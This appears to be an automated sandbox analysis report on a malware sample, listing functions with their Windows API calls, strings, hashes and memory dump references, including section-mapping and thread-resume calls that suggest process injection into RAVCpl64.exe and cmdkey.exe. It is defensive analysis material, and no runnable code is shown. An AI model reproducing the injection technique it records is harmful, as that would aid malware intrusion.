Instruction ID: ff30c36f7c19db7284e0eea8ee0c5494f30ad8db1986c4312712944897a07a38
Opcode Fuzzy Hash: 5d464de5628b9bafdbf8a227178c6fe2350a90ea1978e5b9eab437ab5c8be6d6
Instruction Fuzzy Hash: 8471B075E00709DFEB14EF68C890AAEBBF8EB48648F19406DE441EB755E734AD42CB50

Function 00404665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
wsprintfA.USER32 ref: 004046FB
SetDlgItemTextA.USER32(?,00429820), ref: 0040470E

Strings

%u.%u%s%s, xrefs: 004046DD

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 469c594008fa7237e2d1d16fd7901c9f371c8ab2c4c615d53f44690512f9b9d1
Instruction ID: 3575eb730b5e41c4f883d25dacfc3cf5faa310bf85eded31aa5be4b75c6b21fc
Opcode Fuzzy Hash: 469c594008fa7237e2d1d16fd7901c9f371c8ab2c4c615d53f44690512f9b9d1
Instruction Fuzzy Hash: 97110473A001243BEB0066699C05EAF369DCBC6334F14463BFA25F61D1E9B9AD1186E9

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
Instruction ID: 6b987b391dfe704e5e25f8c5ed1974f346454cd13820caa224fece71ffdffe90
Opcode Fuzzy Hash: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
Instruction Fuzzy Hash: D621B0B1A04208BFEF01AFB4CD4AAAE7BB5EF44344F10053EF541B61D1D6B89940D728

Function 3392EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1182ed0f4ef07a922a665eaee65dd5e892d2b3d5d515311cf1cd60fb4786d3a
Instruction ID: cb1bd5415dd209668cc29e7f1d98db2e68ae0e8b8360f9b85cd9229aa394f1e8
Opcode Fuzzy Hash: d1182ed0f4ef07a922a665eaee65dd5e892d2b3d5d515311cf1cd60fb4786d3a
Instruction Fuzzy Hash: B5E1DF75D00B08CFDB25CFA9C980A9EBBF9BF48354F14462AE586E7669D730A841CF50

Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(00409BC0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.ADVAPI32(?,?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.ADVAPI32(?,?,?,00409BC0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
Instruction ID: 18d1fb4f89ff8b2d67b1f04eab716aa9824ced1508c62e5ffc4d870c518d25f3
Opcode Fuzzy Hash: be294dc6e64afa6848476f7ead589d8a51d46e691ea1366307bbf61bada7ff34
Instruction Fuzzy Hash: 7F1190B1A00118BEEB10ABA5DE89EAF7678FB10358F10403AF905B61D0D7B86D01A668

Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,00435400,?,764D3410,00405471,?,00435400,764D3410,00000000), ref: 004056C8
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1

CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNEL32(00000000,00434800,00000000,00000000,000000F0), ref: 00401622

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
Opcode Fuzzy Hash: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
Instruction ID: 9073a6d5dd373040739bd7ba49bf73079916e51ed90b12fbca594bab97ee4bd6
Opcode Fuzzy Hash: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
Instruction Fuzzy Hash: 51117071A00108BEDB01EFA5DD81DAEBBB9EF04344F20807AF505F21A1D7389E54DB28

Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402DA5,00000001), ref: 00402BD8
GetTickCount.KERNEL32 ref: 00402BF6
CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
ShowWindow.USER32(00000000,00000005), ref: 00402C21

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
Instruction ID: 1e461717de66f8227c62b67df7ec3c369d4a9b771999132610b492aaebc5c7f7
Opcode Fuzzy Hash: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
Instruction Fuzzy Hash: C4F05E30A09220AFC6319F20FE4CA9B7BA4F704B52F400876F501F12E4D7B49882DB9C

Function 339058E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 339608AE

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9dab38307d8115faddea2dd36c0c1d6fd47c71c3ec0b9f7a17d17d61662155b3
Instruction ID: 625478b32482c7cf604a841c86222ee22158d13f68e1f4ca73dd8013ec0379a8
Opcode Fuzzy Hash: 9dab38307d8115faddea2dd36c0c1d6fd47c71c3ec0b9f7a17d17d61662155b3
Instruction Fuzzy Hash: 5B3257B4D08329DFEB21CF64C984BD9BBB8BB08344F0480EAD559A7641DBB55A84CF90

Function 33934B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 33934BB6
0, xrefs: 33934BE3

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: d4aa736f54fe9ee7e8e134e2787367a284d2bea71430fdda4c29309242b8b0fa
Instruction ID: b07eaba207c6485b8ee13be2dc4c786e683e0d333ba937c07de1ef299b7133ae
Opcode Fuzzy Hash: d4aa736f54fe9ee7e8e134e2787367a284d2bea71430fdda4c29309242b8b0fa
Instruction Fuzzy Hash: BB517BB5E02249CFEB24CF95C48469DFBF8EF457A5F59802AD045AB290EB70D985CB80

Function 338FDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 338FDFE0

Strings

0, xrefs: 338FDFC0
0, xrefs: 338FDFAB

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 95c78958beecf3edd375bcc1ea57e8ae13dc6f01351414daf90fe69ee51ccdea
Instruction ID: 8acd0292681d9dd2985c760294c00460789a43f950e40c49c46b8427916cc778
Opcode Fuzzy Hash: 95c78958beecf3edd375bcc1ea57e8ae13dc6f01351414daf90fe69ee51ccdea
Instruction Fuzzy Hash: 96416DB1A087069FD300DF68D454E4ABBE4FB88358F04456EF588DB341D772EA09CB86

Function 00404DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E1F
CallWindowProcA.USER32(?,?,?,?), ref: 00404E70

Part of subcall function 00403ECB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EDD

Strings

, xrefs: 00404E00

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
Instruction ID: 735a5b7f30d8858267acffd8a6d90af7f660f30547e28e970091e6d44494b330
Opcode Fuzzy Hash: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
Instruction Fuzzy Hash: 5D01D4B1100208ABDF216F11DC80E5B3B65F7C0755F148037F704762E1C3398C929BAA

Function 00405851 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405865
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 0040587F

Strings

nsa, xrefs: 0040585C

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction ID: 4003a4fe6d6a1be2c7c6231cfd42d77a102930ba0be0d4b8b296abf0166e01cb
Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction Fuzzy Hash: 7CF05E366482086ADB109A56DC44F9A7B99DB95750F14C02AF904AA180D6B099548B59

Function 00405344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
CloseHandle.KERNEL32(?), ref: 00405376

Strings

Error launching installer, xrefs: 00405357

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
Instruction ID: a3642443da7e6be1e7fb37006141d073ee56f3b6b1647af5c4ef1a74181a0ab0
Opcode Fuzzy Hash: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
Instruction Fuzzy Hash: B4E0ECB4A00209ABEB119F64EC09D6B7BBCFB14344B404521A915E2260D778E4188ABD

Function 00405787 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction ID: 879ea975532de9619441bb2369f95f9e0e18c5552eb9cc1946a4235f5f50821d
Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction Fuzzy Hash: D6F0C235604558FFC7129BA4DD4099EBBB8EF56350F2100AAF900F7211D274EE01ABAA

Analysis Process: RAVCpl64.exePID: 7624, Parent PID: 560COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	1

Executed Functions

Function 05C6D790 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 141
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 05C6D7B6
NtCreateSection.NTDLL ref: 05C6D84D
NtMapViewOfSection.NTDLL ref: 05C6D8AA
NtMapViewOfSection.NTDLL ref: 05C6D8EE

Strings

@, xrefs: 05C6D8BC
@, xrefs: 05C6D845
0, xrefs: 05C6D82A

Memory Dump Source

Source File: 00000003.00000002.17979739801.0000000005BC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5bc0000_RAVCpl64.jbxd

Similarity

API ID: Section$View$CreateSleep
String ID: 0$@$@
API String ID: 2805248592-3221051908
Opcode ID: 76cdf77b22a2e233e021224341d390f165beba3e97baefdb0c96df7045788f3c
Instruction ID: aea9dfec433f6540d9aa1828c59613fffc3961ea6291c5eea66d2fc212502bf4
Opcode Fuzzy Hash: 76cdf77b22a2e233e021224341d390f165beba3e97baefdb0c96df7045788f3c
Instruction Fuzzy Hash: 85518F70A18B088FCB54DF18C48579EBBF5FB48704F10061EE98A93644DB34E646CBC6

Function 05C6D928 Relevance: 3.1, APIs: 2, Instructions: 93
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 05C6D98D
NtResumeThread.NTDLL ref: 05C6DA00

Memory Dump Source

Source File: 00000003.00000002.17979739801.0000000005BC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5bc0000_RAVCpl64.jbxd

Similarity

API ID: ResumeSleepThread
String ID:
API String ID: 1530989685-0
Opcode ID: 8a4f5725503acfaad622c409e08c47bcc6db5cb05883b18f3b319c48cef1d2ba
Instruction ID: f41bfeecdb9611d76010a8c46c7cf2b5180c5c5f0090c2546f3a3adb10f98066
Opcode Fuzzy Hash: 8a4f5725503acfaad622c409e08c47bcc6db5cb05883b18f3b319c48cef1d2ba
Instruction Fuzzy Hash: 8221517061CB4D8FDB68EF6984896AAB7E1FB55314F000B2DD89BC7290EF7096418781

Analysis Process: cmdkey.exePID: 2620, Parent PID: 7624COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Executed Functions

Function 02A2F0AD Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 547
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 02A2F276

Strings

0, xrefs: 02A2F2ED
r,_, xrefs: 02A2F0AE

Memory Dump Source

Source File: 00000004.00000002.15051925075.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a20000_cmdkey.jbxd

Similarity

API ID: InformationProcessQuery
String ID: r,_$0
API String ID: 1778838933-1867104059
Opcode ID: d59769f696c09787be70c6aacb4a55f1e2fd8c7be00940bfea348cea23727dc9
Instruction ID: 22a0c4056b7ba2fa5d9fbe0e04abee56c0b567bcfdd5874864b80f598ef4bc14
Opcode Fuzzy Hash: d59769f696c09787be70c6aacb4a55f1e2fd8c7be00940bfea348cea23727dc9
Instruction Fuzzy Hash: 1B022870668B8C8FCBA5EF68C994AEE77E1FB99304F40061AA84EC7650DF349645CF41

Function 02C334E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C334EA

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf185b3c9a59973f83dcb73a9990a82665fa78a426880bc2f47c739ae2720f53
Instruction ID: 264cdacacc7ea7e4fa48d7bc0fe6279bec0e7134465f54d2a4f4e0836a7d6a3d
Opcode Fuzzy Hash: cf185b3c9a59973f83dcb73a9990a82665fa78a426880bc2f47c739ae2720f53
Instruction Fuzzy Hash: AA90027160510402D50075584A1470710058BD0215F61C915A041456CDCBA5895175A2

Function 02C32A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32A8A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b59fe274f00f5822056a0954540821ee173a5cf12fe36554559fad4e343e4da
Instruction ID: b560a13db089dbc49c899ad30c4906d0aa91571bd750a6231a9653b3b0712ffc
Opcode Fuzzy Hash: 3b59fe274f00f5822056a0954540821ee173a5cf12fe36554559fad4e343e4da
Instruction Fuzzy Hash: 239002A120200003450575584914617400A8BE0215B51C525E1004594DC93588917125

Function 02C32BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32BCA

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc46b324b7493286b514d67ce8e5fb8b01cd7c9d16513d7f1ceac4aa85f9f9d9
Instruction ID: b1a5ec9b22f2264943b8f2a5322feaca6ef04f9b24987dfb7a1d257d68fe5741
Opcode Fuzzy Hash: cc46b324b7493286b514d67ce8e5fb8b01cd7c9d16513d7f1ceac4aa85f9f9d9
Instruction Fuzzy Hash: C890027120100402D5007998590864700058BE0315F51D515A5014559ECA7588917131

Function 02C32B80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32B8A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a79488765fb2318d301db2e6c1a3fc7449324fb652079428f1555ca10ee28974
Instruction ID: 16057847ac89652c902fceb68fded06bae9be8227ff0c222e5c3697cc325d7ae
Opcode Fuzzy Hash: a79488765fb2318d301db2e6c1a3fc7449324fb652079428f1555ca10ee28974
Instruction Fuzzy Hash: A790027120100842D50075584904B4700058BE0315F51C51AA0114658DCA25C8517521

Function 02C32B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32B9A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
